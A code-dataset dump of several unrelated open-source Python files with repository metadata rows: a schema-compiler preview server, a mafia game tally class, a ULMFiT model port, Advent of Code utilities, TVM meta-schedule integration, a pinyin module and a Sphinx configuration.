self.server.highlighters[highlighter_param].GetCSS(style_param) +
'</style>')
body.Append(self.server.highlighters[highlighter_param]
.GetCodeElement(cpp_code, style_param))
except IOError:
self.send_error(404, "File not found: %s" % request_path)
return
except (TypeError, KeyError, AttributeError,
AssertionError, NotImplementedError) as error:
body.Append('<pre>')
body.Append('compiler error: %s' % error)
body.Append('Check server log for more details')
body.Append('</pre>')
raise
def _GetHighlighterParams(self, parsed_url):
"""Get the highlighting parameters from a parsed url.
"""
query_dict = urlparse.parse_qs(parsed_url.query)
return (query_dict.get('highlighter', ['pygments'])[0],
query_dict.get('style', ['colorful'])[0])
def _RenderNavPane(self, path):
"""Renders an HTML nav pane.
This consists of a select element to set highlight style, and a list of all
files at |path| with the appropriate onclick handlers to open either
subdirectories or JSON files.
"""
html = code.Code()
# Highlighter chooser.
html.Append('<select id="highlighters" onChange="updateEverything()">')
for name, highlighter in self.server.highlighters.items():
html.Append('<option value="%s">%s</option>' %
(name, highlighter.DisplayName()))
html.Append('</select>')
html.Append('<br/>')
# Style for each highlighter.
# The correct highlighting will be shown by Javascript.
for name, highlighter in self.server.highlighters.items():
styles = sorted(highlighter.GetStyles())
if not styles:
continue
html.Append('<select class="highlighter_styles" id="%s_styles" '
'onChange="updateEverything()">' % name)
for style in styles:
html.Append('<option>%s</option>' % style)
html.Append('</select>')
html.Append('<br/>')
# The files, with appropriate handlers.
html.Append('<ul>')
# Make path point to a non-empty directory. This can happen if a URL like
# http://localhost:8000 is navigated to.
if path == '':
path = os.curdir
# Firstly, a .. link if this isn't the root.
if not os.path.samefile(os.curdir, path):
normpath = os.path.normpath(os.path.join(path, os.pardir))
html.Append('<li><a href="/%s">%s/</a>' % (normpath, os.pardir))
# Each file under path/
for filename in sorted(os.listdir(path)):
full_path = os.path.join(path, filename)
_, file_ext = os.path.splitext(full_path)
if os.path.isdir(full_path) and not full_path.endswith('.xcodeproj'):
html.Append('<li><a href="/%s/">%s/</a>' % (full_path, filename))
elif file_ext in ['.json', '.idl']:
# cc/h panes will automatically update via the hash change event.
html.Append('<li><a href="#%s">%s</a>' %
(filename, filename))
html.Append('</ul>')
return html.Render()
class PreviewHTTPServer(HTTPServer, object):
def __init__(self,
server_address,
handler,
highlighters,
include_rules,
cpp_namespace_pattern):
super(PreviewHTTPServer, self).__init__(server_address, handler)
self.highlighters = highlighters
self.include_rules = include_rules
self.cpp_namespace_pattern = cpp_namespace_pattern
if __name__ == '__main__':
parser = optparse.OptionParser(
description='Runs a server to preview the json_schema_compiler output.',
usage='usage: %prog [option]...')
parser.add_option('-p', '--port', default='8000',
help='port to run the server on')
parser.add_option('-n', '--namespace', default='generated_api_schemas',
help='C++ namespace for generated files. e.g extensions::api.')
parser.add_option('-I', '--include-rules',
help='A list of paths to include when searching for referenced objects,'
' with the namespace separated by a \':\'. Example: '
'/foo/bar:Foo::Bar::%(namespace)s')
(opts, argv) = parser.parse_args()
def split_path_and_namespace(path_and_namespace):
if ':' not in path_and_namespace:
raise ValueError('Invalid include rule "%s". Rules must be of '
'the form path:namespace' % path_and_namespace)
return path_and_namespace.split(':', 1)
include_rules = []
if opts.include_rules:
include_rules = map(split_path_and_namespace,
shlex.split(opts.include_rules))
try:
print('Starting previewserver on port %s' % opts.port)
print('The extension documentation can be found at:')
print('')
print(' http://localhost:%s/chrome/common/extensions/api' % opts.port)
print('')
highlighters = {
'hilite': hilite_me_highlighter.HiliteMeHighlighter(),
'none': none_highlighter.NoneHighlighter()
}
try:
highlighters['pygments'] = pygments_highlighter.PygmentsHighlighter()
except ImportError as e:
pass
server = PreviewHTTPServer(('', int(opts.port)),
CompilerHandler,
highlighters,
include_rules,
opts.namespace)
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()
| 34.502747 | 80 | 0.644478 |
56b0333e67f7923e809fd921e780ba2ea86bce34 | 466 | py | Python | open_mafia_engine/built_in/lynch_tally.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 9 | 2018-08-19T21:47:00.000Z | 2021-11-30T20:46:09.000Z | open_mafia_engine/built_in/lynch_tally.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 2 | 2021-05-16T00:12:39.000Z | 2021-05-16T18:36:47.000Z | open_mafia_engine/built_in/lynch_tally.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 2 | 2020-11-28T06:13:10.000Z | 2021-05-16T22:23:22.000Z | from typing import List, Optional
from open_mafia_engine.core.all import Actor, GameObject
from .kills import LynchAction
from .voting import Tally
class LynchTally(Tally):
"""Vote tally that lynches the vote leader."""
def respond_leader(self, leader: GameObject) -> Optional[List[LynchAction]]:
"""Override this for particular behavior."""
if isinstance(leader, Actor):
return [LynchAction(self.game, self, target=leader)]
| 29.125 | 80 | 0.716738 |
6184b310214beb2f13b1ef8d9e0dc7412f6405d4 | 10,875 | py | Python | paddlenlp/transformers/ulmfit/modeling.py | akari0216/PaddleNLP | f896be283bbec5096e083859543be451d7ba82c2 | [
"Apache-2.0"
] | null | null | null | paddlenlp/transformers/ulmfit/modeling.py | akari0216/PaddleNLP | f896be283bbec5096e083859543be451d7ba82c2 | [
"Apache-2.0"
] | null | null | null | paddlenlp/transformers/ulmfit/modeling.py | akari0216/PaddleNLP | f896be283bbec5096e083859543be451d7ba82c2 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Copyright 2021 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from .. import PretrainedModel, register_base_model
__all__ = [
"ULMFiTModel",
"ULMFiTPretrainedModel",
"ULMFiTForPretraining",
"ULMFiTPretrainingCriterion",
"ULMFiTForSequenceClassification"
]
def dropout_mask(x, sz, p):
"Return a dropout mask of the same type as `x`, size `sz`, with probability `p` to cancel an element."
x = paddle.empty(shape=sz)
x = paddle.full(x.shape, 1 - p)
x = paddle.bernoulli(x)
x = paddle.divide(x, paddle.to_tensor(1 - p))
return x
# Cell
class RNNDropout(nn.Layer):
"Dropout with probability `p` that is consistent on the seq_len dimension."
def __init__(self, p=0.5):
super(RNNDropout, self).__init__()
self.p = p
def forward(self, x):
if not self.training or self.p == 0.: return x
return x * dropout_mask(x.detach(), [x.shape[0], 1, *x.shape[2:]],
self.p)
# Cell
class WeightDropout(nn.Layer):
"A module that wraps another layer in which some weights will be replaced by 0 during training."
def __init__(self, module, weight_p, layer_names='weight_hh_l0'):
super(WeightDropout, self).__init__()
self.module, self.weight_p, self.layer_names = module, weight_p, [
layer_names
]
def _setweights(self):
"Apply dropout to the raw weights."
# dropout
if self.training:
old_dict = self.module.state_dict()
wgt = old_dict["weight_hh_l0"]
drop_w = nn.functional.dropout(wgt, p=self.weight_p)
old_dict["weight_hh_l0"] = drop_w
old_dict["0.cell.weight_hh"] = drop_w
self.module.set_state_dict(old_dict)
def forward(self, *args):
self._setweights()
with warnings.catch_warnings():
# To avoid the warning that comes because the weights aren't flattened.
warnings.simplefilter("ignore", category=UserWarning)
res = self.module(*args)
return res
def reset(self):
if hasattr(self.module, 'reset'): self.module.reset()
def _do_nothing(self):
pass
# Cell
class EmbeddingDropout(nn.Layer):
"Apply dropout with probability `embed_p` to an embedding layer `emb`."
def __init__(self, emb, embed_p):
super(EmbeddingDropout, self).__init__()
self.emb, self.embed_p = emb, embed_p
def forward(self, words, scale=None):
if self.training and self.embed_p != 0:
size = (self.emb.weight.shape[0], 1)
mask = dropout_mask(self.emb.weight.detach(), size, self.embed_p)
masked_embed = self.emb.weight * mask
else:
masked_embed = self.emb.weight
if scale: masked_embed.mul_(scale)
padding_idx = self.emb._padding_idx
if padding_idx is None: padding_idx = -1
padding_idx = -1
return nn.functional.embedding(words.astype("int64"), masked_embed,
padding_idx, self.emb._sparse)
# Cell
def awd_lstm_lm_split(model):
"Split a RNN `model` in groups for differential learning rates."
groups = [
nn.Sequential(rnn, dp)
for rnn, dp in zip(model[0].rnns, model[0].hidden_dps)
]
groups = [
groups +
[nn.Sequential(model[0].encoder, model[0].encoder_dp, model[1])]
]
return [p for p in groups.parameters()]
# Cell
awd_lstm_lm_config = dict(emb_sz=400,
n_hid=1152,
n_layers=3,
pad_token=1,
bidir=False,
output_p=0.1,
hidden_p=0.15,
input_p=0.25,
embed_p=0.02,
weight_p=0.2,
tie_weights=True,
out_bias=True)
# Cell
def awd_lstm_clas_split(model):
"Split a RNN `model` in groups for differential learning rates."
groups = [
nn.Sequential(model[0].module.encoder, model[0].module.encoder_dp)
]
groups += [
nn.Sequential(rnn, dp)
for rnn, dp in zip(model[0].module.rnns, model[0].module.hidden_dps)
]
groups = [groups + [model[1]]]
return [p for p in groups.parameters()]
# Cell
awd_lstm_clas_config = dict(emb_sz=400,
n_hid=1152,
n_layers=3,
pad_token=1,
bidir=False,
output_p=0.4,
hidden_p=0.3,
input_p=0.4,
embed_p=0.05,
weight_p=0.5)
#每个class和forward下面均要写出文档
layer_norm_eps = 1e-6
#配置模型初始参数值,模型下载路径,以及初始化方法
class ULMFiTPretrainedModel(PretrainedModel):
base_model_prefix = "ulmfit"
model_config_file = "model_config.json"
#预训练权重配置
pretrained_init_configuration = {
}
resource_files_names = {"model_state":"model_state.pdparams"}
#需要上传的权重
pretrained_resource_files_map = {
}
def init_weights(self, layer):
"""Initialize the weights."""
if isinstance(layer, (nn.Linear, nn.Embedding)):
layer.weight.set_value(
paddle.tensor.normal(
mean=0.0,
std=self.initializer_range
if hasattr(self, "initializer_range") else self.ulmfit.config[
"initializer_range"],
shape =layer.weight.shape))
elif isinstance(layer, nn.LayerNorm):
layer._epsilon = layer_norm_eps
#模型核心实现,这里将AWD_LSTM替换为ULMFiTModel
@register_base_model
class ULMFiTModel(ULMFiTPretrainedModel):
"AWD-LSTM inspired by https://arxiv.org/abs/1708.02182"
initrange = 0.1
def __init__(self,
vocab_sz,
emb_sz,
n_hid,
n_layers,
pad_token=1,
hidden_p=0.2,
input_p=0.6,
embed_p=0.1,
output_p=0.1,
weight_p=0.5,
bidir=False,
tie_weights=False,
bias=True):
super(ULMFiTModel, self).__init__()
self.emb_sz = emb_sz
self.n_hid = n_hid
self.n_layers = n_layers
self.pad_token = pad_token
self.bs = 1
self.n_dir = 2 if bidir else 1
self.encoder = nn.Embedding(vocab_sz, emb_sz,
padding_idx=pad_token) #pad_token
self.encoder_dp = EmbeddingDropout(self.encoder, embed_p)
self.rnns = nn.LayerList([
self._one_rnn(emb_sz if l == 0 else n_hid,
(n_hid if l != n_layers - 1 else emb_sz) //
self.n_dir, bidir, weight_p, l)
for l in range(n_layers)
])
self.encoder.weight.set_value(
paddle.uniform(shape=self.encoder._size,
min=-self.initrange,
max=self.initrange))
self.input_dp = RNNDropout(input_p)
self.hidden_dps = nn.LayerList(
[RNNDropout(hidden_p) for l in range(n_layers)])
self.embed_p = embed_p
self.reset()
def forward(self, inp, from_embeds=False):
bs, sl = inp.shape[:2] if from_embeds else inp.shape
if bs != self.bs: self._change_hidden(bs)
if not from_embeds:
inp = self.encoder_dp(inp)
output = self.input_dp(inp)
new_hidden = []
for l, (rnn, hid_dp) in enumerate(zip(self.rnns, self.hidden_dps)):
output, new_h = rnn(output, self.hidden[l])
new_hidden.append((new_h[0].detach(), new_h[1].detach()))
if l != self.n_layers - 1: output = hid_dp(output)
self.hidden = new_hidden
return output
def _change_hidden(self, bs):
self.hidden = [
self._change_one_hidden(l, bs) for l in range(self.n_layers)
]
self.bs = bs
def _one_rnn(self, n_in, n_out, bidir, weight_p, l):
"Return one of the inner rnn"
direct = "bidirectional" if bidir else "forward"
rnn = nn.LSTM(n_in, n_out, 1, time_major=False, direction=direct)
return WeightDropout(rnn, weight_p)
def _one_hidden(self, l):
"Return one hidden state"
nh = (self.n_hid
if l != self.n_layers - 1 else self.emb_sz) // self.n_dir
s = paddle.zeros(shape=[self.n_dir, self.bs, nh])
return (s, s)
def _change_one_hidden(self, l, bs):
if self.bs < bs:
nh = (self.n_hid
if l != self.n_layers - 1 else self.emb_sz) // self.n_dir
s = paddle.zeros(shape=[self.n_dir, bs - self.bs, nh])
return tuple(paddle.concat([h, s], axis=1) for h in self.hidden[l])
if self.bs > bs:
return (self.hidden[l][0][:, :bs], self.hidden[l][1][:, :bs])
return self.hidden[l]
def reset(self):
"Reset the hidden states"
[r.reset() for r in self.rnns if hasattr(r, 'reset')]
self.hidden = [self._one_hidden(l) for l in range(self.n_layers)]
#分类任务实现
class ULMFiTForSequenceClassification(ULMFiTPretrainedModel):
def __init__(self, ulmfit, num_classes=2, dropout=None):
super(ULMFiTForSequenceClassification, self).__init__()
self.num_classes = num_classes
self.ulmfit = ulmfit
self.dropout = nn.Dropout(dropout if dropout is not None else
self.ulmfit.config["hidden_dropout_prob"])
self.classifier = nn.Linear(self.ulmfit.config["hidden_size"],
self.num_classes)
self.apply(self.init_weights)
#postion_ids,attention_mask不清楚是否起作用,暂不加入
def forward(self, input_ids):
_, pooled_output = self.ulmfit(
input_ids)
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
return logits
#暂不太清楚这个类是干嘛的
class ULMFiTForPretraining(ULMFiTPretrainedModel):
None
| 33.256881 | 106 | 0.580966 |
64a92caec9b9a215b5ee8ac3fd2178b3fbf5b04e | 2,845 | py | Python | src/utils.py | mfrdbigolin/AoC2020 | 18757f0d610ad6a7064a22f94688900208260e48 | [
"MIT"
] | null | null | null | src/utils.py | mfrdbigolin/AoC2020 | 18757f0d610ad6a7064a22f94688900208260e48 | [
"MIT"
] | null | null | null | src/utils.py | mfrdbigolin/AoC2020 | 18757f0d610ad6a7064a22f94688900208260e48 | [
"MIT"
] | null | null | null | #!/bin/python3
# Copyright (C) 2020, 2021 Matheus Fernandes Bigolin <mfrdrbigolin@disroot.org>
# SPDX-License-Identifier: MIT
"""General utilities."""
# Avoid ambiguous namespace with the built-in exit and compile.
from sys import exit as finish
from re import findall
from functools import reduce
from collections import Counter
def open_file(fname):
"""Open <fname> and return its contents."""
with open(fname, "r") as reader:
data = reader.read()
return data
def arrange(values, dtype=str, sep="\n"):
"""Separate list <values> according to the separator <sep> and return a
list of <dtype>s. """
return [dtype(v) for v in values.split(sep) if v != ""]
def usage_and_exit(is_exit):
"""If <is_exit>, print usage and exit."""
if is_exit:
print("usage: ./dayN INPUT")
finish(1)
# Typify a tuple of values <ts> according to a tuple of types <dtypes>.
transfig = \
lambda ts, dtypes: tuple(dtypes[i](t) for (i, t) in enumerate(ts))
# Typify a array of tuples <ts> according to a tuple of types <dtypes>.
transfiged = lambda ts, dtypes: [transfig(t, dtypes) for t in ts]
def regex(values, dtypes, form):
"""Organize a array of <values> according to a <form> regular
expression string, return a tuple with the matched with the types
<dtypes>. """
return [transfig(findall(form, l)[0], dtypes) for l in values]
def product(arr):
"""Return the product of a sequence of elements of <arr>."""
return reduce(lambda a,b: a*b, arr)
def assoc(soc, preds):
"""Map the predicates contained in dictionary <preds> to the
values contained in dictionary <soc> and return tautology if all
associations are truthful. """
return all([preds.get(k)(soc.get(k)) for k in soc.keys() \
if preds.get(k) is not None])
def fill(lst, mold, subs):
"""For every <mold> element in <lst>, substitute for the according
<subs> value (indexically). """
nlst = list(lst).copy()
j = 0
for i, elem in enumerate(lst):
if elem == mold:
nlst[i] = subs[j]
j += 1
return nlst
# Transform elements from array <ds> into a dictionary, with its head as
# its key and the tail as its values.
dictf = lambda ds: dict(zip([ds[0]], [ds[1:]] if ds[1:] != [] else []))
# Cumulatively merge alike elements from <d>.
merge = lambda d: reduce(lambda a, b: a | b, d)
# Calculate the pairwise difference between elements of a list <lst>.
diff = lambda lst: [pair[0] - pair[1] for pair in zip(lst[1:], lst[:-1])]
def frequency(lst):
"""Return a Counter with the frequency of the elements in <lst>."""
freq = Counter()
for elem in lst:
freq[elem] += 1
return freq
# Frequency with depth two.
freqd2 = lambda s: reduce(lambda a,b: a + b, [frequency(i) for i in s])
| 25.176991 | 79 | 0.643937 |
f6987ed8bf146199fd17e23e00c348c70b7bac51 | 9,912 | py | Python | python/tvm/meta_schedule/integration.py | MasterJH5574/relax | 47da9537eaccb7526801df11069c05fc457c71bd | [
"Apache-2.0"
] | null | null | null | python/tvm/meta_schedule/integration.py | MasterJH5574/relax | 47da9537eaccb7526801df11069c05fc457c71bd | [
"Apache-2.0"
] | null | null | null | python/tvm/meta_schedule/integration.py | MasterJH5574/relax | 47da9537eaccb7526801df11069c05fc457c71bd | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Meta schedule integration with high-level IR"""
from contextlib import contextmanager
from typing import Callable, Dict, List, Optional, Union
from tvm._ffi import register_object
from tvm.ir import IRModule, transform
from tvm.relay import Any
from tvm.relay import Function as RelayFunc
from tvm.relay import vm
from tvm.runtime import NDArray, Object
from tvm.target import Target
from tvm.tir import PrimFunc
from tvm.relax.expr import Function as RelaxFunc
from tvm.relax.utils import tir_partitioner
from . import _ffi_api
from .database import Database
@register_object("meta_schedule.ExtractedTask")
class ExtractedTask(Object):
"""A tuning task extracted from the high-level IR
Parameters
----------
task_name : str
The name of the task extracted
mod : IRModule
The high-level IR
target: Target
Target information
dispatched : List[IRModule]
A list of low-level IRs that the high-level IR could potentially dispatch to
"""
task_name: str
mod: IRModule
dispatched: List[IRModule]
def __init__(
self,
task_name: str,
mod: IRModule,
target: Target,
dispatched: List[IRModule],
) -> None:
self.__init_handle_by_constructor__(
_ffi_api.ExtractedTask, # type: ignore # pylint: disable=no-member
task_name,
mod,
target,
dispatched,
)
@register_object("meta_schedule.MetaScheduleContext")
class MetaScheduleContext(Object):
"""A context manager interface for the integration"""
def query(
self,
task_name: str,
mod: IRModule,
target: Target,
dispatched: Optional[List[IRModule]],
) -> Union[IRModule, RelayFunc, PrimFunc, None]:
"""The entry point of the integration
Parameters
----------
task_name : str
The name of the task extracted
mod : IRModule
The high-level IR
target: Target
Target Info
dispatched : Optional[List[IRModule]]
A list of low-level IRs that the high-level IR could potentially dispatch to
Returns
-------
result : Union[IRModule, RelayFunc, PrimFunc, None]
There are different types of the output:
1) NullOpt if there is no feedback hint;
2) tir::PrimFunc if `mod` should be lowered to a PrimFunc;
3) relay::Function if `mod` should be dispatched to BYOC workflow;
4) IRModule for unified dispatch
"""
return _ffi_api.MetaScheduleContextQuery( # type: ignore # pylint: disable=no-member
self,
task_name,
mod,
target,
dispatched,
)
@staticmethod
def current() -> Optional["MetaScheduleContext"]:
"""The context manager in the current scope
Returns
-------
ctx : Optional[MetaScheduleContext]
The MetaScheduleContext in the current scope.
NullOpt if it's currently not under any MetaScheduleContext.
"""
return _ffi_api.MetaScheduleContextCurrent() # type: ignore # pylint: disable=no-member
@staticmethod
def query_inside_with_scope(
task_name: str,
mod: IRModule,
target: Target,
dispatched: Optional[List[IRModule]],
) -> Union[IRModule, RelayFunc, PrimFunc, None]:
"""The entry point of the integration workflow. The compilation process of the high-level
IR should call this method for task extraction and for feedback hints
Basically, this method is equivalent to:
.. code-block:: python
def query_inside_with_scope(task_name, mod, dispatched):
ctx = MetaScheduleContext.current()
assert ctx is not None
ctx.query(task_name, mod, target, dispatched)
Parameters
----------
task_name : str
The name of the task
mod : IRModule
The high-level IR
target: Target
Target
dispatched : Optional[List[IRModule]]
A list of low-level IRs that the high-level IR could potentially dispatch to
Returns
-------
result : Union[IRModule, RelayFunc, PrimFunc, None]
There are different types of the output:
1) NullOpt if there is no feedback hint;
2) tir::PrimFunc if `mod` should be lowered to a PrimFunc;
3) relay::Function if `mod` should be dispatched to BYOC workflow;
4) IRModule for unified dispatch
"""
return _ffi_api.MetaScheduleContextQueryInsideWithScope( # type: ignore # pylint: disable=no-member
task_name,
mod,
target,
dispatched,
)
def __enter__(self) -> "MetaScheduleContext":
"""Entering the scope of the context manager"""
_ffi_api.MetaScheduleContextEnterScope(self) # type: ignore # pylint: disable=no-member
return self
def __exit__(self, ptype, value, trace) -> None:
"""Exiting the scope of the context manager"""
_ffi_api.MetaScheduleContextExitScope(self) # type: ignore # pylint: disable=no-member
@register_object("meta_schedule.TaskExtraction")
class TaskExtraction(MetaScheduleContext):
"""An integration context for task extraction"""
tasks: List[ExtractedTask]
"""The extracted tasks"""
def __init__(self) -> None:
self.__init_handle_by_constructor__(_ffi_api.TaskExtraction) # type: ignore # pylint: disable=no-member
@register_object("meta_schedule.ApplyHistoryBest")
class ApplyHistoryBest(MetaScheduleContext):
"""An integration context that allows application of historically best record from database"""
database: Database
""" The database to be queried from"""
def __init__(self, database) -> None:
self.__init_handle_by_constructor__(_ffi_api.ApplyHistoryBest, database) # type: ignore # pylint: disable=no-member
def extract_task_from_relay(
mod: Union[IRModule, RelayFunc],
target: Target,
params: Optional[Dict[str, NDArray]] = None,
*,
opt_level: int = 3,
pass_config: Dict[str, Any] = {
"relay.backend.use_meta_schedule": True,
},
disabled_pass: List[str] = [],
) -> List[ExtractedTask]:
"""Extract tuning tasks from a relay program.
Parameters
----------
mod : Union[tvm.IRModule, tvm.relay.Function]
The module or function to tune
target : tvm.target.Target
The compilation target
params : Optional[Dict[str, tvm.runtime.NDArray]]
The associated parameters of the program
opt_level : int
The optimization level of the compiler
pass_config : Dict[str, Any]
The pass config of the compiler
disabled_pass : List[str]
The list of disabled passes of the compiler
Returns
-------
tasks: List[ExtractedTask]
The tasks extracted from this network
"""
@contextmanager
def _autotvm_silencer():
from tvm import autotvm # pylint: disable=import-outside-toplevel
silent = autotvm.GLOBAL_SCOPE.silent
autotvm.GLOBAL_SCOPE.silent = True
try:
yield
finally:
autotvm.GLOBAL_SCOPE.silent = silent
def _thread_run(func: Callable[[], None]) -> None:
import threading # pylint: disable=import-outside-toplevel
thread = threading.Thread(target=func)
thread.start()
thread.join()
env = TaskExtraction()
if isinstance(mod, RelayFunc):
mod = IRModule.from_expr(mod)
if not isinstance(target, Target):
target = Target(target)
def _func():
with env, _autotvm_silencer(), transform.PassContext(
config=pass_config,
disabled_pass=disabled_pass,
opt_level=opt_level,
):
compiler = vm.VMCompiler()
if params:
compiler.set_params(params)
compiler.lower(mod, target)
_thread_run(_func)
return env.tasks
def extract_task_from_relax(mod: Union[IRModule, RelaxFunc], target: Target) -> List[ExtractedTask]:
"""Extract tuning tasks from a relax program.
Parameters
----------
mod : Union[tvm.IRModule, tvm.relax.Function]
The module or function to tune
target : tvm.target.Target
The compilation target
Returns
-------
tasks: List[ExtractedTask]
The tasks extracted from this module
"""
if isinstance(mod, RelaxFunc):
mod = IRModule.from_expr(mod)
if not isinstance(target, Target):
target = Target(target)
tir_partitions = tir_partitioner(mod)
tasks = []
for tir_mod in tir_partitions:
task_name = tir_mod.get_global_vars()[0].name_hint
# The second arg to ExtractedTask is supposed to be a high-level IRModule,
# passing tir_mod as a workaround.
tasks.append(ExtractedTask(task_name, tir_mod, target, [tir_mod]))
return tasks
| 32.392157 | 124 | 0.64659 |
5db93b558c60b260b7b8b835cd896ec729ad18b6 | 2,271 | py | Python | xmnlp/pinyin/pinyin.py | CGEDJNU/xmnlp | ad2d3c0b8875cf415c3adffc10926605da7a458b | [
"MIT"
] | 1 | 2019-09-12T07:19:58.000Z | 2019-09-12T07:19:58.000Z | xmnlp/pinyin/pinyin.py | TactictNLP/xmnlp | ad2d3c0b8875cf415c3adffc10926605da7a458b | [
"MIT"
] | null | null | null | xmnlp/pinyin/pinyin.py | TactictNLP/xmnlp | ad2d3c0b8875cf415c3adffc10926605da7a458b | [
"MIT"
] | 1 | 2020-04-20T08:58:45.000Z | 2020-04-20T08:58:45.000Z | # !/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
# -------------------------------------------#
# author: sean lee #
# email: xmlee97@gmail.com #
#--------------------------------------------#
"""MIT License
Copyright (c) 2018 Sean
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE."""
import sys
if sys.version_info[0] == 2:
reload(sys)
sys.setdefaultencoding('utf8')
range = xrange
import io
import os
from ..module import Module
from ..utils import native_content
from ..utils.trie import Trie
from ..utils import safe_input
class Pinyin(Module):
__notsave__ = []
__onlysave__ = ['trie']
def __init__(self):
self.trie = Trie()
def train(self, fpath):
for fname in self.filelist(fpath):
with io.open(fname, 'r', encoding='utf-8') as f:
for line in f:
line = safe_input(line)
words = line.split()
self.trie.add(words[0], words[1:])
def translate(self, text):
ret = []
for t in self.trie.get(text):
if isinstance(t, list) or isinstance(t, tuple):
ret = ret + t
else:
ret.append(t)
return ret | 34.409091 | 78 | 0.641127 |
3f2163c65499202ee2f5c3d3b02077d61371cff9 | 11,000 | py | Python | docs/conf.py | companieshouse/headline-news | 606cd6f3c501ef8157b347561ab230bad49a1b81 | [
"MIT"
] | null | null | null | docs/conf.py | companieshouse/headline-news | 606cd6f3c501ef8157b347561ab230bad49a1b81 | [
"MIT"
] | null | null | null | docs/conf.py | companieshouse/headline-news | 606cd6f3c501ef8157b347561ab230bad49a1b81 | [
"MIT"
] | 1 | 2021-04-10T21:14:10.000Z | 2021-04-10T21:14:10.000Z | # headline-news documentation build configuration file
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this autogenerated file.
#
# All configuration values have a default; values that are commented out serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory, add these directories to sys.path here.
# If the directory is relative to the documentation root, use os.path.abspath to make it absolute, like shown here.
# import sys
# sys.path.insert(0, os.path.abspath("."))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = "1.0"
# Add any Sphinx extension module names here, as strings. They can be extensions coming with Sphinx
# (named 'sphinx.ext.*') or your custom ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosectionlabel",
"sphinx.ext.autosummary",
"sphinx.ext.napoleon",
"myst_parser",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames. You can specify multiple suffix as a list of string:
# source_suffix = [".rst", ".md"]
source_suffix = {
".rst": "restructuredtext",
".md": "markdown",
}
# The encoding of source files.
#
# source_encoding = "utf-8-sig"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "headline-news"
author = "companieshouse"
# The version info for the project you're documenting, acts as replacement for |version| and |release|, also used in
# various other places throughout the built documents.
# The short X.Y.Z version.
version = "0.0.1"
# The full version, including alpha/beta/rc tags.
release = "0.0.1"
# The language for content autogenerated by Sphinx. Refer to documentation for a list of supported languages.
# This is also used if you do content translation via gettext catalogs. Usually you set "language" from the command
# line for these cases.
# language = None
# There are two options for replacing |today|: either, you set today to some non-false value, then it is used:
#
# today = ""
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = "%B %d, %Y"
# List of patterns, relative to source directory, that match files and directories to ignore when looking for source
# files. These patterns also affect html_static_path and html_extra_path
exclude_patterns = [
"_build",
"Thumbs.db",
".DS_Store",
"README.md"]
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as 'system message' paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme further. For a list of options available
# for each theme, see the documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. "<project> v<release> documentation" by default.
# html_title = "None"
# A shorter title for the navigation bar. Default is the same as html_title.
